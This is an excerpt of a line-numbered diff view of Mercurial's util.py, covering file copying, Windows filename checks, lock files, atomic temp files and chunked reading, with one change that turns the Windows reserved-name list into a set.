1030 1030 # executable version (py2exe) doesn't support __file__
1031 1031 datapath = os.path.dirname(pycompat.sysexecutable)
1032 1032 else:
1033 1033 datapath = os.path.dirname(pycompat.fsencode(__file__))
1034 1034
1035 1035 i18n.setdatapath(datapath)
1036 1036
1037 1037 _hgexecutable = None
1038 1038
1039 1039 def hgexecutable():
1040 1040 """return location of the 'hg' executable.
1041 1041
1042 1042 Defaults to $HG or 'hg' in the search path.
1043 1043 """
1044 1044 if _hgexecutable is None:
1045 1045 hg = encoding.environ.get('HG')
1046 1046 mainmod = sys.modules[pycompat.sysstr('__main__')]
1047 1047 if hg:
1048 1048 _sethgexecutable(hg)
1049 1049 elif mainfrozen():
1050 1050 if getattr(sys, 'frozen', None) == 'macosx_app':
1051 1051 # Env variable set by py2app
1052 1052 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1053 1053 else:
1054 1054 _sethgexecutable(pycompat.sysexecutable)
1055 1055 elif (os.path.basename(
1056 1056 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1057 1057 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1058 1058 else:
1059 1059 exe = findexe('hg') or os.path.basename(sys.argv[0])
1060 1060 _sethgexecutable(exe)
1061 1061 return _hgexecutable
1062 1062
1063 1063 def _sethgexecutable(path):
1064 1064 """set location of the 'hg' executable"""
1065 1065 global _hgexecutable
1066 1066 _hgexecutable = path
1067 1067
1068 1068 def _isstdout(f):
1069 1069 fileno = getattr(f, 'fileno', None)
1070 1070 return fileno and fileno() == sys.__stdout__.fileno()
1071 1071
1072 1072 def shellenviron(environ=None):
1073 1073 """return environ with optional override, useful for shelling out"""
1074 1074 def py2shell(val):
1075 1075 'convert python object into string that is useful to shell'
1076 1076 if val is None or val is False:
1077 1077 return '0'
1078 1078 if val is True:
1079 1079 return '1'
1080 1080 return str(val)
1081 1081 env = dict(encoding.environ)
1082 1082 if environ:
1083 1083 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1084 1084 env['HG'] = hgexecutable()
1085 1085 return env
1086 1086
1087 1087 def system(cmd, environ=None, cwd=None, out=None):
1088 1088 '''enhanced shell command execution.
1089 1089 run with environment maybe modified, maybe in different dir.
1090 1090
1091 1091 if out is specified, it is assumed to be a file-like object that has a
1092 1092 write() method. stdout and stderr will be redirected to out.'''
1093 1093 try:
1094 1094 stdout.flush()
1095 1095 except Exception:
1096 1096 pass
1097 1097 cmd = quotecommand(cmd)
1098 1098 env = shellenviron(environ)
1099 1099 if out is None or _isstdout(out):
1100 1100 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1101 1101 env=env, cwd=cwd)
1102 1102 else:
1103 1103 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1104 1104 env=env, cwd=cwd, stdout=subprocess.PIPE,
1105 1105 stderr=subprocess.STDOUT)
1106 1106 for line in iter(proc.stdout.readline, ''):
1107 1107 out.write(line)
1108 1108 proc.wait()
1109 1109 rc = proc.returncode
1110 1110 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1111 1111 rc = 0
1112 1112 return rc
1113 1113
1114 1114 def checksignature(func):
1115 1115 '''wrap a function with code to check for calling errors'''
1116 1116 def check(*args, **kwargs):
1117 1117 try:
1118 1118 return func(*args, **kwargs)
1119 1119 except TypeError:
1120 1120 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1121 1121 raise error.SignatureError
1122 1122 raise
1123 1123
1124 1124 return check
1125 1125
1126 1126 # a whilelist of known filesystems where hardlink works reliably
1127 1127 _hardlinkfswhitelist = {
1128 1128 'btrfs',
1129 1129 'ext2',
1130 1130 'ext3',
1131 1131 'ext4',
1132 1132 'hfs',
1133 1133 'jfs',
1134 1134 'reiserfs',
1135 1135 'tmpfs',
1136 1136 'ufs',
1137 1137 'xfs',
1138 1138 'zfs',
1139 1139 }
1140 1140
1141 1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1142 1142 '''copy a file, preserving mode and optionally other stat info like
1143 1143 atime/mtime
1144 1144
1145 1145 checkambig argument is used with filestat, and is useful only if
1146 1146 destination file is guarded by any lock (e.g. repo.lock or
1147 1147 repo.wlock).
1148 1148
1149 1149 copystat and checkambig should be exclusive.
1150 1150 '''
1151 1151 assert not (copystat and checkambig)
1152 1152 oldstat = None
1153 1153 if os.path.lexists(dest):
1154 1154 if checkambig:
1155 1155 oldstat = checkambig and filestat.frompath(dest)
1156 1156 unlink(dest)
1157 1157 if hardlink:
1158 1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1159 1159 # unless we are confident that dest is on a whitelisted filesystem.
1160 1160 try:
1161 1161 fstype = getfstype(os.path.dirname(dest))
1162 1162 except OSError:
1163 1163 fstype = None
1164 1164 if fstype not in _hardlinkfswhitelist:
1165 1165 hardlink = False
1166 1166 if hardlink:
1167 1167 try:
1168 1168 oslink(src, dest)
1169 1169 return
1170 1170 except (IOError, OSError):
1171 1171 pass # fall back to normal copy
1172 1172 if os.path.islink(src):
1173 1173 os.symlink(os.readlink(src), dest)
1174 1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1175 1175 # for them anyway
1176 1176 else:
1177 1177 try:
1178 1178 shutil.copyfile(src, dest)
1179 1179 if copystat:
1180 1180 # copystat also copies mode
1181 1181 shutil.copystat(src, dest)
1182 1182 else:
1183 1183 shutil.copymode(src, dest)
1184 1184 if oldstat and oldstat.stat:
1185 1185 newstat = filestat.frompath(dest)
1186 1186 if newstat.isambig(oldstat):
1187 1187 # stat of copied file is ambiguous to original one
1188 1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1189 1189 os.utime(dest, (advanced, advanced))
1190 1190 except shutil.Error as inst:
1191 1191 raise Abort(str(inst))
1192 1192
1193 1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1194 1194 """Copy a directory tree using hardlinks if possible."""
1195 1195 num = 0
1196 1196
1197 1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1198 1198
1199 1199 if os.path.isdir(src):
1200 1200 if hardlink is None:
1201 1201 hardlink = (os.stat(src).st_dev ==
1202 1202 os.stat(os.path.dirname(dst)).st_dev)
1203 1203 topic = gettopic()
1204 1204 os.mkdir(dst)
1205 1205 for name, kind in listdir(src):
1206 1206 srcname = os.path.join(src, name)
1207 1207 dstname = os.path.join(dst, name)
1208 1208 def nprog(t, pos):
1209 1209 if pos is not None:
1210 1210 return progress(t, pos + num)
1211 1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1212 1212 num += n
1213 1213 else:
1214 1214 if hardlink is None:
1215 1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1216 1216 os.stat(os.path.dirname(dst)).st_dev)
1217 1217 topic = gettopic()
1218 1218
1219 1219 if hardlink:
1220 1220 try:
1221 1221 oslink(src, dst)
1222 1222 except (IOError, OSError):
1223 1223 hardlink = False
1224 1224 shutil.copy(src, dst)
1225 1225 else:
1226 1226 shutil.copy(src, dst)
1227 1227 num += 1
1228 1228 progress(topic, num)
1229 1229 progress(topic, None)
1230 1230
1231 1231 return hardlink, num
1232 1232
1233 _winreservednames = b'''con prn aux nul
1234 com1 com2 com3 com4 com5 com6 com7 com8 com9
1235 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1233 _winreservednames = {
1234 'con', 'prn', 'aux', 'nul',
1235 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1236 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1237 }
1236 1238 _winreservedchars = ':*?"<>|'
1237 1239 def checkwinfilename(path):
1238 1240 r'''Check that the base-relative path is a valid filename on Windows.
1239 1241 Returns None if the path is ok, or a UI string describing the problem.
1240 1242
1241 1243 >>> checkwinfilename("just/a/normal/path")
1242 1244 >>> checkwinfilename("foo/bar/con.xml")
1243 1245 "filename contains 'con', which is reserved on Windows"
1244 1246 >>> checkwinfilename("foo/con.xml/bar")
1245 1247 "filename contains 'con', which is reserved on Windows"
1246 1248 >>> checkwinfilename("foo/bar/xml.con")
1247 1249 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1248 1250 "filename contains 'AUX', which is reserved on Windows"
1249 1251 >>> checkwinfilename("foo/bar/bla:.txt")
1250 1252 "filename contains ':', which is reserved on Windows"
1251 1253 >>> checkwinfilename("foo/bar/b\07la.txt")
1252 1254 "filename contains '\\x07', which is invalid on Windows"
1253 1255 >>> checkwinfilename("foo/bar/bla ")
1254 1256 "filename ends with ' ', which is not allowed on Windows"
1255 1257 >>> checkwinfilename("../bar")
1256 1258 >>> checkwinfilename("foo\\")
1257 1259 "filename ends with '\\', which is invalid on Windows"
1258 1260 >>> checkwinfilename("foo\\/bar")
1259 1261 "directory name ends with '\\', which is invalid on Windows"
1260 1262 '''
1261 1263 if path.endswith('\\'):
1262 1264 return _("filename ends with '\\', which is invalid on Windows")
1263 1265 if '\\/' in path:
1264 1266 return _("directory name ends with '\\', which is invalid on Windows")
1265 1267 for n in path.replace('\\', '/').split('/'):
1266 1268 if not n:
1267 1269 continue
1268 1270 for c in _filenamebytestr(n):
1269 1271 if c in _winreservedchars:
1270 1272 return _("filename contains '%s', which is reserved "
1271 1273 "on Windows") % c
1272 1274 if ord(c) <= 31:
1273 1275 return _("filename contains %r, which is invalid "
1274 1276 "on Windows") % c
1275 1277 base = n.split('.')[0]
1276 1278 if base and base.lower() in _winreservednames:
1277 1279 return _("filename contains '%s', which is reserved "
1278 1280 "on Windows") % base
1279 1281 t = n[-1]
1280 1282 if t in '. ' and n not in '..':
1281 1283 return _("filename ends with '%s', which is not allowed "
1282 1284 "on Windows") % t
1283 1285
1284 1286 if pycompat.osname == 'nt':
1285 1287 checkosfilename = checkwinfilename
1286 1288 timer = time.clock
1287 1289 else:
1288 1290 checkosfilename = platform.checkosfilename
1289 1291 timer = time.time
1290 1292
1291 1293 if safehasattr(time, "perf_counter"):
1292 1294 timer = time.perf_counter
1293 1295
1294 1296 def makelock(info, pathname):
1295 1297 try:
1296 1298 return os.symlink(info, pathname)
1297 1299 except OSError as why:
1298 1300 if why.errno == errno.EEXIST:
1299 1301 raise
1300 1302 except AttributeError: # no symlink in os
1301 1303 pass
1302 1304
1303 1305 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1304 1306 os.write(ld, info)
1305 1307 os.close(ld)
1306 1308
1307 1309 def readlock(pathname):
1308 1310 try:
1309 1311 return os.readlink(pathname)
1310 1312 except OSError as why:
1311 1313 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1312 1314 raise
1313 1315 except AttributeError: # no symlink in os
1314 1316 pass
1315 1317 fp = posixfile(pathname)
1316 1318 r = fp.read()
1317 1319 fp.close()
1318 1320 return r
1319 1321
1320 1322 def fstat(fp):
1321 1323 '''stat file object that may not have fileno method.'''
1322 1324 try:
1323 1325 return os.fstat(fp.fileno())
1324 1326 except AttributeError:
1325 1327 return os.stat(fp.name)
1326 1328
1327 1329 # File system features
1328 1330
1329 1331 def fscasesensitive(path):
1330 1332 """
1331 1333 Return true if the given path is on a case-sensitive filesystem
1332 1334
1333 1335 Requires a path (like /foo/.hg) ending with a foldable final
1334 1336 directory component.
1335 1337 """
1336 1338 s1 = os.lstat(path)
1337 1339 d, b = os.path.split(path)
1338 1340 b2 = b.upper()
1339 1341 if b == b2:
1340 1342 b2 = b.lower()
1341 1343 if b == b2:
1342 1344 return True # no evidence against case sensitivity
1343 1345 p2 = os.path.join(d, b2)
1344 1346 try:
1345 1347 s2 = os.lstat(p2)
1346 1348 if s2 == s1:
1347 1349 return False
1348 1350 return True
1349 1351 except OSError:
1350 1352 return True
1351 1353
1352 1354 try:
1353 1355 import re2
1354 1356 _re2 = None
1355 1357 except ImportError:
1356 1358 _re2 = False
1357 1359
1358 1360 class _re(object):
1359 1361 def _checkre2(self):
1360 1362 global _re2
1361 1363 try:
1362 1364 # check if match works, see issue3964
1363 1365 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1364 1366 except ImportError:
1365 1367 _re2 = False
1366 1368
1367 1369 def compile(self, pat, flags=0):
1368 1370 '''Compile a regular expression, using re2 if possible
1369 1371
1370 1372 For best performance, use only re2-compatible regexp features. The
1371 1373 only flags from the re module that are re2-compatible are
1372 1374 IGNORECASE and MULTILINE.'''
1373 1375 if _re2 is None:
1374 1376 self._checkre2()
1375 1377 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1376 1378 if flags & remod.IGNORECASE:
1377 1379 pat = '(?i)' + pat
1378 1380 if flags & remod.MULTILINE:
1379 1381 pat = '(?m)' + pat
1380 1382 try:
1381 1383 return re2.compile(pat)
1382 1384 except re2.error:
1383 1385 pass
1384 1386 return remod.compile(pat, flags)
1385 1387
1386 1388 @propertycache
1387 1389 def escape(self):
1388 1390 '''Return the version of escape corresponding to self.compile.
1389 1391
1390 1392 This is imperfect because whether re2 or re is used for a particular
1391 1393 function depends on the flags, etc, but it's the best we can do.
1392 1394 '''
1393 1395 global _re2
1394 1396 if _re2 is None:
1395 1397 self._checkre2()
1396 1398 if _re2:
1397 1399 return re2.escape
1398 1400 else:
1399 1401 return remod.escape
1400 1402
1401 1403 re = _re()
1402 1404
1403 1405 _fspathcache = {}
1404 1406 def fspath(name, root):
1405 1407 '''Get name in the case stored in the filesystem
1406 1408
1407 1409 The name should be relative to root, and be normcase-ed for efficiency.
1408 1410
1409 1411 Note that this function is unnecessary, and should not be
1410 1412 called, for case-sensitive filesystems (simply because it's expensive).
1411 1413
1412 1414 The root should be normcase-ed, too.
1413 1415 '''
1414 1416 def _makefspathcacheentry(dir):
1415 1417 return dict((normcase(n), n) for n in os.listdir(dir))
1416 1418
1417 1419 seps = pycompat.ossep
1418 1420 if pycompat.osaltsep:
1419 1421 seps = seps + pycompat.osaltsep
1420 1422 # Protect backslashes. This gets silly very quickly.
1421 1423 seps.replace('\\','\\\\')
1422 1424 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1423 1425 dir = os.path.normpath(root)
1424 1426 result = []
1425 1427 for part, sep in pattern.findall(name):
1426 1428 if sep:
1427 1429 result.append(sep)
1428 1430 continue
1429 1431
1430 1432 if dir not in _fspathcache:
1431 1433 _fspathcache[dir] = _makefspathcacheentry(dir)
1432 1434 contents = _fspathcache[dir]
1433 1435
1434 1436 found = contents.get(part)
1435 1437 if not found:
1436 1438 # retry "once per directory" per "dirstate.walk" which
1437 1439 # may take place for each patches of "hg qpush", for example
1438 1440 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1439 1441 found = contents.get(part)
1440 1442
1441 1443 result.append(found or part)
1442 1444 dir = os.path.join(dir, part)
1443 1445
1444 1446 return ''.join(result)
1445 1447
1446 1448 def getfstype(dirpath):
1447 1449 '''Get the filesystem type name from a directory (best-effort)
1448 1450
1449 1451 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1450 1452 '''
1451 1453 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1452 1454
1453 1455 def checknlink(testfile):
1454 1456 '''check whether hardlink count reporting works properly'''
1455 1457
1456 1458 # testfile may be open, so we need a separate file for checking to
1457 1459 # work around issue2543 (or testfile may get lost on Samba shares)
1458 1460 f1 = testfile + ".hgtmp1"
1459 1461 if os.path.lexists(f1):
1460 1462 return False
1461 1463 try:
1462 1464 posixfile(f1, 'w').close()
1463 1465 except IOError:
1464 1466 try:
1465 1467 os.unlink(f1)
1466 1468 except OSError:
1467 1469 pass
1468 1470 return False
1469 1471
1470 1472 f2 = testfile + ".hgtmp2"
1471 1473 fd = None
1472 1474 try:
1473 1475 oslink(f1, f2)
1474 1476 # nlinks() may behave differently for files on Windows shares if
1475 1477 # the file is open.
1476 1478 fd = posixfile(f2)
1477 1479 return nlinks(f2) > 1
1478 1480 except OSError:
1479 1481 return False
1480 1482 finally:
1481 1483 if fd is not None:
1482 1484 fd.close()
1483 1485 for f in (f1, f2):
1484 1486 try:
1485 1487 os.unlink(f)
1486 1488 except OSError:
1487 1489 pass
1488 1490
1489 1491 def endswithsep(path):
1490 1492 '''Check path ends with os.sep or os.altsep.'''
1491 1493 return (path.endswith(pycompat.ossep)
1492 1494 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1493 1495
1494 1496 def splitpath(path):
1495 1497 '''Split path by os.sep.
1496 1498 Note that this function does not use os.altsep because this is
1497 1499 an alternative of simple "xxx.split(os.sep)".
1498 1500 It is recommended to use os.path.normpath() before using this
1499 1501 function if need.'''
1500 1502 return path.split(pycompat.ossep)
1501 1503
1502 1504 def gui():
1503 1505 '''Are we running in a GUI?'''
1504 1506 if pycompat.sysplatform == 'darwin':
1505 1507 if 'SSH_CONNECTION' in encoding.environ:
1506 1508 # handle SSH access to a box where the user is logged in
1507 1509 return False
1508 1510 elif getattr(osutil, 'isgui', None):
1509 1511 # check if a CoreGraphics session is available
1510 1512 return osutil.isgui()
1511 1513 else:
1512 1514 # pure build; use a safe default
1513 1515 return True
1514 1516 else:
1515 1517 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1516 1518
1517 1519 def mktempcopy(name, emptyok=False, createmode=None):
1518 1520 """Create a temporary file with the same contents from name
1519 1521
1520 1522 The permission bits are copied from the original file.
1521 1523
1522 1524 If the temporary file is going to be truncated immediately, you
1523 1525 can use emptyok=True as an optimization.
1524 1526
1525 1527 Returns the name of the temporary file.
1526 1528 """
1527 1529 d, fn = os.path.split(name)
1528 1530 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1529 1531 os.close(fd)
1530 1532 # Temporary files are created with mode 0600, which is usually not
1531 1533 # what we want. If the original file already exists, just copy
1532 1534 # its mode. Otherwise, manually obey umask.
1533 1535 copymode(name, temp, createmode)
1534 1536 if emptyok:
1535 1537 return temp
1536 1538 try:
1537 1539 try:
1538 1540 ifp = posixfile(name, "rb")
1539 1541 except IOError as inst:
1540 1542 if inst.errno == errno.ENOENT:
1541 1543 return temp
1542 1544 if not getattr(inst, 'filename', None):
1543 1545 inst.filename = name
1544 1546 raise
1545 1547 ofp = posixfile(temp, "wb")
1546 1548 for chunk in filechunkiter(ifp):
1547 1549 ofp.write(chunk)
1548 1550 ifp.close()
1549 1551 ofp.close()
1550 1552 except: # re-raises
1551 1553 try: os.unlink(temp)
1552 1554 except OSError: pass
1553 1555 raise
1554 1556 return temp
1555 1557
1556 1558 class filestat(object):
1557 1559 """help to exactly detect change of a file
1558 1560
1559 1561 'stat' attribute is result of 'os.stat()' if specified 'path'
1560 1562 exists. Otherwise, it is None. This can avoid preparative
1561 1563 'exists()' examination on client side of this class.
1562 1564 """
1563 1565 def __init__(self, stat):
1564 1566 self.stat = stat
1565 1567
1566 1568 @classmethod
1567 1569 def frompath(cls, path):
1568 1570 try:
1569 1571 stat = os.stat(path)
1570 1572 except OSError as err:
1571 1573 if err.errno != errno.ENOENT:
1572 1574 raise
1573 1575 stat = None
1574 1576 return cls(stat)
1575 1577
1576 1578 @classmethod
1577 1579 def fromfp(cls, fp):
1578 1580 stat = os.fstat(fp.fileno())
1579 1581 return cls(stat)
1580 1582
1581 1583 __hash__ = object.__hash__
1582 1584
1583 1585 def __eq__(self, old):
1584 1586 try:
1585 1587 # if ambiguity between stat of new and old file is
1586 1588 # avoided, comparison of size, ctime and mtime is enough
1587 1589 # to exactly detect change of a file regardless of platform
1588 1590 return (self.stat.st_size == old.stat.st_size and
1589 1591 self.stat.st_ctime == old.stat.st_ctime and
1590 1592 self.stat.st_mtime == old.stat.st_mtime)
1591 1593 except AttributeError:
1592 1594 pass
1593 1595 try:
1594 1596 return self.stat is None and old.stat is None
1595 1597 except AttributeError:
1596 1598 return False
1597 1599
1598 1600 def isambig(self, old):
1599 1601 """Examine whether new (= self) stat is ambiguous against old one
1600 1602
1601 1603 "S[N]" below means stat of a file at N-th change:
1602 1604
1603 1605 - S[n-1].ctime < S[n].ctime: can detect change of a file
1604 1606 - S[n-1].ctime == S[n].ctime
1605 1607 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1606 1608 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1607 1609 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1608 1610 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1609 1611
1610 1612 Case (*2) above means that a file was changed twice or more at
1611 1613 same time in sec (= S[n-1].ctime), and comparison of timestamp
1612 1614 is ambiguous.
1613 1615
1614 1616 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1615 1617 timestamp is ambiguous".
1616 1618
1617 1619 But advancing mtime only in case (*2) doesn't work as
1618 1620 expected, because naturally advanced S[n].mtime in case (*1)
1619 1621 might be equal to manually advanced S[n-1 or earlier].mtime.
1620 1622
1621 1623 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1622 1624 treated as ambiguous regardless of mtime, to avoid overlooking
1623 1625 by confliction between such mtime.
1624 1626
1625 1627 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1626 1628 S[n].mtime", even if size of a file isn't changed.
1627 1629 """
1628 1630 try:
1629 1631 return (self.stat.st_ctime == old.stat.st_ctime)
1630 1632 except AttributeError:
1631 1633 return False
1632 1634
1633 1635 def avoidambig(self, path, old):
1634 1636 """Change file stat of specified path to avoid ambiguity
1635 1637
1636 1638 'old' should be previous filestat of 'path'.
1637 1639
1638 1640 This skips avoiding ambiguity, if a process doesn't have
1639 1641 appropriate privileges for 'path'. This returns False in this
1640 1642 case.
1641 1643
1642 1644 Otherwise, this returns True, as "ambiguity is avoided".
1643 1645 """
1644 1646 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1645 1647 try:
1646 1648 os.utime(path, (advanced, advanced))
1647 1649 except OSError as inst:
1648 1650 if inst.errno == errno.EPERM:
1649 1651 # utime() on the file created by another user causes EPERM,
1650 1652 # if a process doesn't have appropriate privileges
1651 1653 return False
1652 1654 raise
1653 1655 return True
1654 1656
1655 1657 def __ne__(self, other):
1656 1658 return not self == other
1657 1659
1658 1660 class atomictempfile(object):
1659 1661 '''writable file object that atomically updates a file
1660 1662
1661 1663 All writes will go to a temporary copy of the original file. Call
1662 1664 close() when you are done writing, and atomictempfile will rename
1663 1665 the temporary copy to the original name, making the changes
1664 1666 visible. If the object is destroyed without being closed, all your
1665 1667 writes are discarded.
1666 1668
1667 1669 checkambig argument of constructor is used with filestat, and is
1668 1670 useful only if target file is guarded by any lock (e.g. repo.lock
1669 1671 or repo.wlock).
1670 1672 '''
1671 1673 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1672 1674 self.__name = name # permanent name
1673 1675 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1674 1676 createmode=createmode)
1675 1677 self._fp = posixfile(self._tempname, mode)
1676 1678 self._checkambig = checkambig
1677 1679
1678 1680 # delegated methods
1679 1681 self.read = self._fp.read
1680 1682 self.write = self._fp.write
1681 1683 self.seek = self._fp.seek
1682 1684 self.tell = self._fp.tell
1683 1685 self.fileno = self._fp.fileno
1684 1686
1685 1687 def close(self):
1686 1688 if not self._fp.closed:
1687 1689 self._fp.close()
1688 1690 filename = localpath(self.__name)
1689 1691 oldstat = self._checkambig and filestat.frompath(filename)
1690 1692 if oldstat and oldstat.stat:
1691 1693 rename(self._tempname, filename)
1692 1694 newstat = filestat.frompath(filename)
1693 1695 if newstat.isambig(oldstat):
1694 1696 # stat of changed file is ambiguous to original one
1695 1697 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1696 1698 os.utime(filename, (advanced, advanced))
1697 1699 else:
1698 1700 rename(self._tempname, filename)
1699 1701
1700 1702 def discard(self):
1701 1703 if not self._fp.closed:
1702 1704 try:
1703 1705 os.unlink(self._tempname)
1704 1706 except OSError:
1705 1707 pass
1706 1708 self._fp.close()
1707 1709
1708 1710 def __del__(self):
1709 1711 if safehasattr(self, '_fp'): # constructor actually did something
1710 1712 self.discard()
1711 1713
1712 1714 def __enter__(self):
1713 1715 return self
1714 1716
1715 1717 def __exit__(self, exctype, excvalue, traceback):
1716 1718 if exctype is not None:
1717 1719 self.discard()
1718 1720 else:
1719 1721 self.close()
1720 1722
1721 1723 def unlinkpath(f, ignoremissing=False):
1722 1724 """unlink and remove the directory if it is empty"""
1723 1725 if ignoremissing:
1724 1726 tryunlink(f)
1725 1727 else:
1726 1728 unlink(f)
1727 1729 # try removing directories that might now be empty
1728 1730 try:
1729 1731 removedirs(os.path.dirname(f))
1730 1732 except OSError:
1731 1733 pass
1732 1734
1733 1735 def tryunlink(f):
1734 1736 """Attempt to remove a file, ignoring ENOENT errors."""
1735 1737 try:
1736 1738 unlink(f)
1737 1739 except OSError as e:
1738 1740 if e.errno != errno.ENOENT:
1739 1741 raise
1740 1742
1741 1743 def makedirs(name, mode=None, notindexed=False):
1742 1744 """recursive directory creation with parent mode inheritance
1743 1745
1744 1746 Newly created directories are marked as "not to be indexed by
1745 1747 the content indexing service", if ``notindexed`` is specified
1746 1748 for "write" mode access.
1747 1749 """
1748 1750 try:
1749 1751 makedir(name, notindexed)
1750 1752 except OSError as err:
1751 1753 if err.errno == errno.EEXIST:
1752 1754 return
1753 1755 if err.errno != errno.ENOENT or not name:
1754 1756 raise
1755 1757 parent = os.path.dirname(os.path.abspath(name))
1756 1758 if parent == name:
1757 1759 raise
1758 1760 makedirs(parent, mode, notindexed)
1759 1761 try:
1760 1762 makedir(name, notindexed)
1761 1763 except OSError as err:
1762 1764 # Catch EEXIST to handle races
1763 1765 if err.errno == errno.EEXIST:
1764 1766 return
1765 1767 raise
1766 1768 if mode is not None:
1767 1769 os.chmod(name, mode)
1768 1770
1769 1771 def readfile(path):
1770 1772 with open(path, 'rb') as fp:
1771 1773 return fp.read()
1772 1774
1773 1775 def writefile(path, text):
1774 1776 with open(path, 'wb') as fp:
1775 1777 fp.write(text)
1776 1778
1777 1779 def appendfile(path, text):
1778 1780 with open(path, 'ab') as fp:
1779 1781 fp.write(text)
1780 1782
1781 1783 class chunkbuffer(object):
1782 1784 """Allow arbitrary sized chunks of data to be efficiently read from an
1783 1785 iterator over chunks of arbitrary size."""
1784 1786
1785 1787 def __init__(self, in_iter):
1786 1788 """in_iter is the iterator that's iterating over the input chunks."""
1787 1789 def splitbig(chunks):
1788 1790 for chunk in chunks:
1789 1791 if len(chunk) > 2**20:
1790 1792 pos = 0
1791 1793 while pos < len(chunk):
1792 1794 end = pos + 2 ** 18
1793 1795 yield chunk[pos:end]
1794 1796 pos = end
1795 1797 else:
1796 1798 yield chunk
1797 1799 self.iter = splitbig(in_iter)
1798 1800 self._queue = collections.deque()
1799 1801 self._chunkoffset = 0
1800 1802
1801 1803 def read(self, l=None):
1802 1804 """Read L bytes of data from the iterator of chunks of data.
1803 1805 Returns less than L bytes if the iterator runs dry.
1804 1806
1805 1807 If size parameter is omitted, read everything"""
1806 1808 if l is None:
1807 1809 return ''.join(self.iter)
1808 1810
1809 1811 left = l
1810 1812 buf = []
1811 1813 queue = self._queue
1812 1814 while left > 0:
1813 1815 # refill the queue
1814 1816 if not queue:
1815 1817 target = 2**18
1816 1818 for chunk in self.iter:
1817 1819 queue.append(chunk)
1818 1820 target -= len(chunk)
1819 1821 if target <= 0:
1820 1822 break
1821 1823 if not queue:
1822 1824 break
1823 1825
1824 1826 # The easy way to do this would be to queue.popleft(), modify the
1825 1827 # chunk (if necessary), then queue.appendleft(). However, for cases
1826 1828 # where we read partial chunk content, this incurs 2 dequeue
1827 1829 # mutations and creates a new str for the remaining chunk in the
1828 1830 # queue. Our code below avoids this overhead.
1829 1831
1830 1832 chunk = queue[0]
1831 1833 chunkl = len(chunk)
1832 1834 offset = self._chunkoffset
1833 1835
1834 1836 # Use full chunk.
1835 1837 if offset == 0 and left >= chunkl:
1836 1838 left -= chunkl
1837 1839 queue.popleft()
1838 1840 buf.append(chunk)
1839 1841 # self._chunkoffset remains at 0.
1840 1842 continue
1841 1843
1842 1844 chunkremaining = chunkl - offset
1843 1845
1844 1846 # Use all of unconsumed part of chunk.
1845 1847 if left >= chunkremaining:
1846 1848 left -= chunkremaining
1847 1849 queue.popleft()
1848 1850 # offset == 0 is enabled by block above, so this won't merely
1849 1851 # copy via ``chunk[0:]``.
1850 1852 buf.append(chunk[offset:])
1851 1853 self._chunkoffset = 0
1852 1854
1853 1855 # Partial chunk needed.
1854 1856 else:
1855 1857 buf.append(chunk[offset:offset + left])
1856 1858 self._chunkoffset += left
1857 1859 left -= chunkremaining
1858 1860
1859 1861 return ''.join(buf)
1860 1862
1861 1863 def filechunkiter(f, size=131072, limit=None):
1862 1864 """Create a generator that produces the data in the file size
1863 1865 (default 131072) bytes at a time, up to optional limit (default is
1864 1866 to read all data). Chunks may be less than size bytes if the
1865 1867 chunk is the last chunk in the file, or the file is a socket or
1866 1868 some other type of file that sometimes reads less data than is
1867 1869 requested."""
1868 1870 assert size >= 0
1869 1871 assert limit is None or limit >= 0
1870 1872 while True:
1871 1873 if limit is None:
1872 1874 nbytes = size
1873 1875 else:
1874 1876 nbytes = min(limit, size)
1875 1877 s = nbytes and f.read(nbytes)
1876 1878 if not s:
1877 1879 break
1878 1880 if limit:
1879 1881 limit -= len(s)
1880 1882 yield s
1881 1883
1882 1884 def makedate(timestamp=None):
1883 1885 '''Return a unix timestamp (or the current time) as a (unixtime,
1884 1886 offset) tuple based off the local timezone.'''
1885 1887 if timestamp is None:
1886 1888 timestamp = time.time()
1887 1889 if timestamp < 0:
1888 1890 hint = _("check your clock")
1889 1891 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
